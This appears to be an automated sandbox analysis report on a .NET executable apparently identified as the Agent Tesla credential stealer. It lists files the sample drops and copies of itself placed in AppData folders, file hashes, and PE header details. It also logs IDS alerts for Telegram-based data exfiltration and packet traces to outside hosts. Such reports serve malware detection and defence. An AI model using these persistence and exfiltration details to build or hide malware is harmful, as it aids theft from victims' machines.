                                              Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Transactions, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\4f0a7eefa3cd3e0ba98b5ebddbbc72e6\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\f1d8480152e0da9a60ad49c6d16a3b6d\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\8d67d92724ba494b6c7fd089d6f25b48\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\b219d4630d26b88041b59c21e8e2b95c\System.Xml.ni.dll",0..2,"System.EnterpriseServices, Version=4.0.0.0, Culture=neut

                                              C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache

                                              Download File
                                              Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                              File Type:data
                                              Category:dropped
                                              Size (bytes):5829
                                              Entropy (8bit):4.902247628650607
                                              Encrypted:false
                                              SSDEEP:96:3CJ2Woe5F2k6Lm5emmXIGegyg12jDs+un/iQLEYFjDaeWJ6KGcmXs9smEFRLcU6j:Wxoe5FVsm5emdzgkjDt4iWN3yBGHc9s8
                                              MD5:F948233D40FE29A0FFB67F9BB2F050B5
                                              SHA1:9A815D3F218A9374788F3ECF6BE3445F14B414D8
                                              SHA-256:C18202AA4EF262432135AFF5139D0981281F528918A2EEA3858B064DFB66BE4F
                                              SHA-512:FD86A2C713FFA10FC083A34B60D7447DCB0622E83CC5992BBDAB8B3C7FEB7150999A68A8A9B055F263423478C0879ED462B7669FDE7067BC829D79DD3974787C
                                              Malicious:false
                                              Preview:PSMODULECACHE.............Y...C:\Program Files (x86)\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PowerShellGet.psd1........Uninstall-Module........inmo........fimo........Install-Module........New-ScriptFileInfo........Publish-Module........Install-Script........Update-Script........Find-Command........Update-ModuleManifest........Find-DscResource........Save-Module........Save-Script........upmo........Uninstall-Script........Get-InstalledScript........Update-Module........Register-PSRepository........Find-Script........Unregister-PSRepository........pumo........Test-ScriptFileInfo........Update-ScriptFileInfo........Set-PSRepository........Get-PSRepository........Get-InstalledModule........Find-Module........Find-RoleCapability........Publish-Script................T...C:\Program Files (x86)\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PSModule.psm1*.......Install-Script........Save-Module........Publish-Module........Find-Module........Download-Package........Update-Module....

                                              C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                              Download File
                                              Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                              File Type:data
                                              Category:dropped
                                              Size (bytes):15596
                                              Entropy (8bit):5.5531622815475545
                                              Encrypted:false
                                              SSDEEP:384:Fte/bq0uRu2AH68SBxnuilrIaBsFv917NnlZ:VA/4xuilrwxplZ
                                              MD5:9EF84D725C2607A4AED65AD3158C3AB1
                                              SHA1:9BAB855CB21B192916AD2E728A2A7447ED986BA2
                                              SHA-256:5F70DC72B68DB5E131213081C0B253710ABD4F42EBA9BB0449E4ADED30F3070F
                                              SHA-512:7799E2FA990922355A2DC76BECA969FFCA860060C2CFAFF89A9F9A6E935ACE4747351181570411422BB3AA9B3F83507E8F9E6764090EF7F2EF4918F07E4A1189
                                              Malicious:false
                                              Preview:@...e...........$.......$...N.A.A.....1.........................H...............<@.^.L."My...:'..... .Microsoft.PowerShell.ConsoleHostD...............fZve...F.....x.)........System.Management.Automation4...............[...{a.C..%6..h.........System.Core.0...............G-.o...A...4B..........System..4................Zg5..:O..g..q..........System.Xml..L...............7.....J@......~.......#.Microsoft.Management.Infrastructure.8................'....L..}............System.Numerics.@................Lo...QN......<Q........System.DirectoryServices<................H..QN.Y.f............System.Management...4....................].D.E.............System.Data.H................. ....H..m)aUu.........Microsoft.PowerShell.Security...<.................~.[L.D.Z.>..m.........System.Transactions.<................):gK..G...$.1.q........System.ConfigurationP................./.C..J..%...].......%.Microsoft.PowerShell.Commands.Utility...D..................-.D.F.<;.nt.1........System.Configuration.Ins

                                              C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_2egqyutc.ddd.psm1

                                              Download File
                                              Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                              File Type:very short file (no magic)
                                              Category:dropped
                                              Size (bytes):1
                                              Entropy (8bit):0.0
                                              Encrypted:false
                                              SSDEEP:3:U:U
                                              MD5:C4CA4238A0B923820DCC509A6F75849B
                                              SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                              SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                              SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                              Malicious:false
                                              Preview:1

                                              C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_cea0kgqa.155.psm1

                                              Download File
                                              Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                              File Type:very short file (no magic)
                                              Category:dropped
                                              Size (bytes):1
                                              Entropy (8bit):0.0
                                              Encrypted:false
                                              SSDEEP:3:U:U
                                              MD5:C4CA4238A0B923820DCC509A6F75849B
                                              SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                              SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                              SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                              Malicious:false
                                              Preview:1

                                              C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_fkiks3cu.tp3.ps1

                                              Download File
                                              Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                              File Type:very short file (no magic)
                                              Category:dropped
                                              Size (bytes):1
                                              Entropy (8bit):0.0
                                              Encrypted:false
                                              SSDEEP:3:U:U
                                              MD5:C4CA4238A0B923820DCC509A6F75849B
                                              SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                              SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                              SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                              Malicious:false
                                              Preview:1

                                              C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_l3bxpezw.gna.ps1

                                              Download File
                                              Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                              File Type:very short file (no magic)
                                              Category:dropped
                                              Size (bytes):1
                                              Entropy (8bit):0.0
                                              Encrypted:false
                                              SSDEEP:3:U:U
                                              MD5:C4CA4238A0B923820DCC509A6F75849B
                                              SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                              SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                              SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                              Malicious:false
                                              Preview:1

                                              C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_tilezn50.bbb.psm1

                                              Download File
                                              Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                              File Type:very short file (no magic)
                                              Category:dropped
                                              Size (bytes):1
                                              Entropy (8bit):0.0
                                              Encrypted:false
                                              SSDEEP:3:U:U
                                              MD5:C4CA4238A0B923820DCC509A6F75849B
                                              SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                              SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                              SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                              Malicious:false
                                              Preview:1

                                              C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_vy0mxscm.2f4.ps1

                                              Download File
                                              Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                              File Type:very short file (no magic)
                                              Category:dropped
                                              Size (bytes):1
                                              Entropy (8bit):0.0
                                              Encrypted:false
                                              SSDEEP:3:U:U
                                              MD5:C4CA4238A0B923820DCC509A6F75849B
                                              SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                              SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                              SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                              Malicious:false
                                              Preview:1

                                              C:\Users\user\AppData\Roaming\Uwztwjweuc\Qasvjoldkyh.exe

                                              Download File
                                              Process:C:\Users\user\Desktop\file.exe
                                              File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                              Category:dropped
                                              Size (bytes):1825280
                                              Entropy (8bit):5.291589770491668
                                              Encrypted:false
                                              SSDEEP:24576:rWWKtu1Dze6HDpLaCKyUjOK/sQg1GuYfyQ6vOHRQPrMgYJvlaWW33Q4Sfp8gkAmh:6JJjdagPM3v90Q6pYX
                                              MD5:2DDEC3A033A6DED2EC135BB2F3EC897D
                                              SHA1:CB40F86B808C7B7812FFF7820DC596D3A78E5760
                                              SHA-256:BB4297E1D60FBF0C9670F3A436D3C00993307CCF5BBF9BADE4A6EBCB608EDD6C
                                              SHA-512:12FE7E8088D62A32F53BA9DB9E425D41F8C95DEA742AF3E7BEECC8CAE50E97E9573EBFA839EC339D57804B32C2A864110F9135BCDE8123C2B5D10A1E3B4C7C38
                                              Malicious:true
                                              Antivirus:
                                              • Antivirus: Joe Sandbox ML, Detection: 100%
                                              • Antivirus: ReversingLabs, Detection: 36%
                                              • Antivirus: Virustotal, Detection: 44%, Browse
                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d................................. ........@.. .......................@............`.....................................J.......0.................... ....................................................... ............... ..H............text........ ...................... ..`.rsrc...0...........................@..@.reloc....... ......................@..B........................H.......09..t.......4....U.............................................N.(.....-.+.(-...+.*^+..-.&+......+.*s....+..0..M.......+#,.+&+'+(.-.&+.+'+.*+)+*.-.&&+.+$+.*(....+..+..+.s1...+.(....+..+..+.(....+.....0..T.......++,.+.+/+0+1.-.&+.+0+.*+2+3+4.-.&&&+.(....+.*(....+..+..+..+.s@...+.(....+..+..+..+..0..G.......+#,..-..-.+ +!.-.&+.+ +.*.,.+.+ &.,.*(....+..+.s5...+.(....+..+.(....+...0..H.......+$,.+'+(.-.&.,..-.+.+!+.*+#.-.&+.+.+.*(....+..+.sV...+.(....+..+.(....+..0..O...

                                              C:\Users\user\AppData\Roaming\Uwztwjweuc\Qasvjoldkyh.exe:Zone.Identifier

                                              Download File
                                              Process:C:\Users\user\Desktop\file.exe
                                              File Type:ASCII text, with CRLF line terminators
                                              Category:dropped
                                              Size (bytes):26
                                              Entropy (8bit):3.95006375643621
                                              Encrypted:false
                                              SSDEEP:3:ggPYV:rPYV
                                              MD5:187F488E27DB4AF347237FE461A079AD
                                              SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                              SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                              SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                              Malicious:true
                                              Preview:[ZoneTransfer]....ZoneId=0

                                              C:\Users\user\AppData\Roaming\kDPmkTm\kDPmkTm.exe

                                              Download File
                                              Process:C:\Users\user\Desktop\file.exe
                                              File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                              Category:dropped
                                              Size (bytes):1825280
                                              Entropy (8bit):5.291589770491668
                                              Encrypted:false
                                              SSDEEP:24576:rWWKtu1Dze6HDpLaCKyUjOK/sQg1GuYfyQ6vOHRQPrMgYJvlaWW33Q4Sfp8gkAmh:6JJjdagPM3v90Q6pYX
                                              MD5:2DDEC3A033A6DED2EC135BB2F3EC897D
                                              SHA1:CB40F86B808C7B7812FFF7820DC596D3A78E5760
                                              SHA-256:BB4297E1D60FBF0C9670F3A436D3C00993307CCF5BBF9BADE4A6EBCB608EDD6C
                                              SHA-512:12FE7E8088D62A32F53BA9DB9E425D41F8C95DEA742AF3E7BEECC8CAE50E97E9573EBFA839EC339D57804B32C2A864110F9135BCDE8123C2B5D10A1E3B4C7C38
                                              Malicious:true
                                              Antivirus:
                                              • Antivirus: Joe Sandbox ML, Detection: 100%
                                              • Antivirus: ReversingLabs, Detection: 36%
                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d................................. ........@.. .......................@............`.....................................J.......0.................... ....................................................... ............... ..H............text........ ...................... ..`.rsrc...0...........................@..@.reloc....... ......................@..B........................H.......09..t.......4....U.............................................N.(.....-.+.(-...+.*^+..-.&+......+.*s....+..0..M.......+#,.+&+'+(.-.&+.+'+.*+)+*.-.&&+.+$+.*(....+..+..+.s1...+.(....+..+..+.(....+.....0..T.......++,.+.+/+0+1.-.&+.+0+.*+2+3+4.-.&&&+.(....+.*(....+..+..+..+.s@...+.(....+..+..+..+..0..G.......+#,..-..-.+ +!.-.&+.+ +.*.,.+.+ &.,.*(....+..+.s5...+.(....+..+.(....+...0..H.......+$,.+'+(.-.&.,..-.+.+!+.*+#.-.&+.+.+.*(....+..+.sV...+.(....+..+.(....+..0..O...

                                              C:\Users\user\AppData\Roaming\kDPmkTm\kDPmkTm.exe:Zone.Identifier

                                              Download File
                                              Process:C:\Users\user\Desktop\file.exe
                                              File Type:ASCII text, with CRLF line terminators
                                              Category:modified
                                              Size (bytes):26
                                              Entropy (8bit):3.95006375643621
                                              Encrypted:false
                                              SSDEEP:3:ggPYV:rPYV
                                              MD5:187F488E27DB4AF347237FE461A079AD
                                              SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                              SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                              SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                              Malicious:true
                                              Preview:[ZoneTransfer]....ZoneId=0

                                              Static File Info

                                              General

                                              File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                              Entropy (8bit):5.291589770491668
                                              TrID:
                                              • Win32 Executable (generic) Net Framework (10011505/4) 49.80%
                                              • Win32 Executable (generic) a (10002005/4) 49.75%
                                              • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                                              • Windows Screen Saver (13104/52) 0.07%
                                              • Generic Win/DOS Executable (2004/3) 0.01%
                                              File name:file.exe
                                              File size:1825280
                                              MD5:2ddec3a033a6ded2ec135bb2f3ec897d
                                              SHA1:cb40f86b808c7b7812fff7820dc596d3a78e5760
                                              SHA256:bb4297e1d60fbf0c9670f3a436d3c00993307ccf5bbf9bade4a6ebcb608edd6c
                                              SHA512:12fe7e8088d62a32f53ba9db9e425d41f8c95dea742af3e7beecc8cae50e97e9573ebfa839ec339d57804b32c2a864110f9135bcde8123c2b5d10a1e3b4c7c38
                                              SSDEEP:24576:rWWKtu1Dze6HDpLaCKyUjOK/sQg1GuYfyQ6vOHRQPrMgYJvlaWW33Q4Sfp8gkAmh:6JJjdagPM3v90Q6pYX
                                              TLSH:5D855BF20283FEC5A76F1D4484143940AC1418676BBC9768FDC92A97A3E9524EF9DEF0
                                              File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d................................. ........@.. .......................@............`................................

                                              File Icon

                                              Icon Hash:00828e8e8686b000

                                              Static PE Info

                                              General

                                              Entrypoint:0x5beeda
                                              Entrypoint Section:.text
                                              Digitally signed:false
                                              Imagebase:0x400000
                                              Subsystem:windows gui
                                              Image File Characteristics:EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
                                              DLL Characteristics:HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                              Time Stamp:0x6418981C [Mon Mar 20 17:30:04 2023 UTC]
                                              TLS Callbacks:
                                              CLR (.Net) Version:
                                              OS Version Major:4
                                              OS Version Minor:0
                                              File Version Major:4
                                              File Version Minor:0
                                              Subsystem Version Major:4
                                              Subsystem Version Minor:0
                                              Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744

                                              Entrypoint Preview

                                              Instruction
                                              jmp dword ptr [00402000h]
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al

                                              Data Directories

                                              NameVirtual AddressVirtual Size Is in Section
                                              IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                              IMAGE_DIRECTORY_ENTRY_IMPORT0x1bee900x4a.text
                                              IMAGE_DIRECTORY_ENTRY_RESOURCE0x1c00000x530.rsrc
                                              IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                              IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                              IMAGE_DIRECTORY_ENTRY_BASERELOC0x1c20000xc.reloc
                                              IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                              IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                              IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                              IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                              IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                              IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                              IMAGE_DIRECTORY_ENTRY_IAT0x20000x8.text
                                              IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                              IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x20080x48.text
                                              IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                              Sections

                                              NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                              .text0x20000x1bcee00x1bd000False0.4746565572331461data5.286588181165908IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                              .rsrc0x1c00000x5300x600False0.3938802083333333data3.806174196677056IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                              .reloc0x1c20000xc0x200False0.044921875data0.10191042566270775IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                              Resources

                                              NameRVASizeTypeLanguageCountry
                                              RT_VERSION0x1c005c0x2e4data
                                              RT_MANIFEST0x1c037c0x1b4XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with very long lines (433), with no line terminators

                                              Imports

                                              DLLImport
                                              mscoree.dll_CorExeMain

                                              Network Behavior

                                              Snort IDS Alerts

                                              TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                                              192.168.2.4149.154.167.220497024432851779 03/20/23-19:39:50.282462TCP2851779ETPRO TROJAN Agent Tesla Telegram Exfil49702443192.168.2.4149.154.167.220
                                              192.168.2.4149.154.167.220496984432851779 03/20/23-19:38:26.620974TCP2851779ETPRO TROJAN Agent Tesla Telegram Exfil49698443192.168.2.4149.154.167.220

                                              Network Port Distribution

                                              TCP Packets

                                              TimestampSource PortDest PortSource IPDest IP
                                              Mar 20, 2023 19:38:19.603668928 CET49697443192.168.2.4104.237.62.211
                                              Mar 20, 2023 19:38:19.603749990 CET44349697104.237.62.211192.168.2.4
                                              Mar 20, 2023 19:38:19.603835106 CET49697443192.168.2.4104.237.62.211
                                              Mar 20, 2023 19:38:19.630438089 CET49697443192.168.2.4104.237.62.211
                                              Mar 20, 2023 19:38:19.630492926 CET44349697104.237.62.211192.168.2.4
                                              Mar 20, 2023 19:38:20.328294039 CET44349697104.237.62.211192.168.2.4
                                              Mar 20, 2023 19:38:20.328383923 CET49697443192.168.2.4104.237.62.211
                                              Mar 20, 2023 19:38:20.340078115 CET49697443192.168.2.4104.237.62.211
                                              Mar 20, 2023 19:38:20.340123892 CET44349697104.237.62.211192.168.2.4
                                              Mar 20, 2023 19:38:20.340564966 CET44349697104.237.62.211192.168.2.4
                                              Mar 20, 2023 19:38:20.380551100 CET49697443192.168.2.4104.237.62.211
                                              Mar 20, 2023 19:38:20.649841070 CET49697443192.168.2.4104.237.62.211
                                              Mar 20, 2023 19:38:20.649912119 CET44349697104.237.62.211192.168.2.4
                                              Mar 20, 2023 19:38:20.818044901 CET44349697104.237.62.211192.168.2.4
                                              Mar 20, 2023 19:38:20.818145990 CET44349697104.237.62.211192.168.2.4
                                              Mar 20, 2023 19:38:20.818200111 CET49697443192.168.2.4104.237.62.211
                                              Mar 20, 2023 19:38:20.819470882 CET49697443192.168.2.4104.237.62.211
                                              Mar 20, 2023 19:38:26.500169039 CET49698443192.168.2.4149.154.167.220
                                              Mar 20, 2023 19:38:26.500233889 CET44349698149.154.167.220192.168.2.4
                                              Mar 20, 2023 19:38:26.500312090 CET49698443192.168.2.4149.154.167.220
                                              Mar 20, 2023 19:38:26.501146078 CET49698443192.168.2.4149.154.167.220
                                              Mar 20, 2023 19:38:26.501173973 CET44349698149.154.167.220192.168.2.4
                                              Mar 20, 2023 19:38:26.574767113 CET44349698149.154.167.220192.168.2.4
                                              Mar 20, 2023 19:38:26.574979067 CET49698443192.168.2.4149.154.167.220
                                              Mar 20, 2023 19:38:26.578350067 CET49698443192.168.2.4149.154.167.220
                                              Mar 20, 2023 19:38:26.578412056 CET44349698149.154.167.220192.168.2.4
                                              Mar 20, 2023 19:38:26.578983068 CET44349698149.154.167.220192.168.2.4
                                              Mar 20, 2023 19:38:26.581166029 CET49698443192.168.2.4149.154.167.220
                                              Mar 20, 2023 19:38:26.581233978 CET44349698149.154.167.220192.168.2.4
                                              Mar 20, 2023 19:38:26.618748903 CET44349698149.154.167.220192.168.2.4
                                              Mar 20, 2023 19:38:26.620809078 CET49698443192.168.2.4149.154.167.220
                                              Mar 20, 2023 19:38:26.620852947 CET44349698149.154.167.220192.168.2.4
                                              Mar 20, 2023 19:38:27.011068106 CET44349698149.154.167.220192.168.2.4
                                              Mar 20, 2023 19:38:27.011209965 CET44349698149.154.167.220192.168.2.4
                                              Mar 20, 2023 19:38:27.011363983 CET49698443192.168.2.4149.154.167.220
                                              Mar 20, 2023 19:38:27.027559042 CET49698443192.168.2.4149.154.167.220
                                              Mar 20, 2023 19:39:25.531714916 CET49700443192.168.2.4104.237.62.211
                                              Mar 20, 2023 19:39:25.531794071 CET44349700104.237.62.211192.168.2.4
                                              Mar 20, 2023 19:39:25.531898022 CET49700443192.168.2.4104.237.62.211
                                              Mar 20, 2023 19:39:25.550930023 CET49700443192.168.2.4104.237.62.211
                                              Mar 20, 2023 19:39:25.550990105 CET44349700104.237.62.211192.168.2.4
                                              Mar 20, 2023 19:39:26.260768890 CET44349700104.237.62.211192.168.2.4
                                              Mar 20, 2023 19:39:26.260880947 CET49700443192.168.2.4104.237.62.211
                                              Mar 20, 2023 19:39:26.265906096 CET49700443192.168.2.4104.237.62.211
                                              Mar 20, 2023 19:39:26.265940905 CET44349700104.237.62.211192.168.2.4
                                              Mar 20, 2023 19:39:26.266740084 CET44349700104.237.62.211192.168.2.4
                                              Mar 20, 2023 19:39:26.386190891 CET49700443192.168.2.4104.237.62.211
                                              Mar 20, 2023 19:39:26.640167952 CET49700443192.168.2.4104.237.62.211
                                              Mar 20, 2023 19:39:26.640227079 CET44349700104.237.62.211192.168.2.4
                                              Mar 20, 2023 19:39:26.808101892 CET44349700104.237.62.211192.168.2.4
                                              Mar 20, 2023 19:39:26.808207035 CET44349700104.237.62.211192.168.2.4
                                              Mar 20, 2023 19:39:26.808506012 CET49700443192.168.2.4104.237.62.211
                                              Mar 20, 2023 19:39:26.810086012 CET49700443192.168.2.4104.237.62.211
                                              Mar 20, 2023 19:39:50.165476084 CET49702443192.168.2.4149.154.167.220
                                              Mar 20, 2023 19:39:50.165545940 CET44349702149.154.167.220192.168.2.4
                                              Mar 20, 2023 19:39:50.165632010 CET49702443192.168.2.4149.154.167.220
                                              Mar 20, 2023 19:39:50.166136980 CET49702443192.168.2.4149.154.167.220
                                              Mar 20, 2023 19:39:50.166155100 CET44349702149.154.167.220192.168.2.4
                                              Mar 20, 2023 19:39:50.230001926 CET44349702149.154.167.220192.168.2.4
                                              Mar 20, 2023 19:39:50.230119944 CET49702443192.168.2.4149.154.167.220
                                              Mar 20, 2023 19:39:50.232402086 CET49702443192.168.2.4149.154.167.220
                                              Mar 20, 2023 19:39:50.232420921 CET44349702149.154.167.220192.168.2.4
                                              Mar 20, 2023 19:39:50.232748985 CET44349702149.154.167.220192.168.2.4
                                              Mar 20, 2023 19:39:50.234488010 CET49702443192.168.2.4149.154.167.220
                                              Mar 20, 2023 19:39:50.234508991 CET44349702149.154.167.220192.168.2.4
                                              Mar 20, 2023 19:39:50.282051086 CET44349702149.154.167.220192.168.2.4
                                              Mar 20, 2023 19:39:50.282367945 CET49702443192.168.2.4149.154.167.220
                                              Mar 20, 2023 19:39:50.282392025 CET44349702149.154.167.220192.168.2.4
                                              Mar 20, 2023 19:39:50.449218988 CET44349702149.154.167.220192.168.2.4
                                              Mar 20, 2023 19:39:50.449340105 CET44349702149.154.167.220192.168.2.4
                                              Mar 20, 2023 19:39:50.449481964 CET49702443192.168.2.4149.154.167.220
                                              Mar 20, 2023 19:39:50.759490013 CET49702443192.168.2.4149.154.167.220

                                              UDP Packets

                                              TimestampSource PortDest PortSource IPDest IP
                                              Mar 20, 2023 19:38:19.534012079 CET5091153192.168.2.48.8.8.8
                                              Mar 20, 2023 19:38:19.553659916 CET53509118.8.8.8192.168.2.4
                                              Mar 20, 2023 19:38:19.561065912 CET5968353192.168.2.48.8.8.8
